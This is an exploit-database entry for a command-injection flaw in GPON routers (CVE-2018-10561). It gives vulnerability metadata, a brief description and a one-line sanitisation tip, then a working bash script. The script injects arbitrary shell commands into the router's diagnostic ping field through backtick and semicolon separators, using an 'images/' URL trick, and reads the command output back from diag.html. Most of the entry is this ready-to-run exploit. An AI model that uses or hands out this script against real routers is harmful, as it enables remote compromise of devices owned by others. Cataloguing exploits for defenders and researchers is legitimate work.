header-logo
Suggest Exploit
vendor:
GPON Router
by:
Anonymous
9.8
CVSS
CRITICAL
Command Injection
78
CWE
Product Name: GPON Router
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2018-10561
CPE: o:fiberhome:gpon_router
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Unknown
2020

Sending and Retrieving Commands on GPON Routers

This exploit allows an attacker to send and retrieve commands on GPON routers. The exploit sends the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices. The attacker then waits for 3 seconds and retrieves the output from the diag.html page.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any system command.
Source

Exploit-DB raw data:

#!/bin/bash

echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the ouput…."
curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’

Navigation

Suggest Exploit

Services By CQR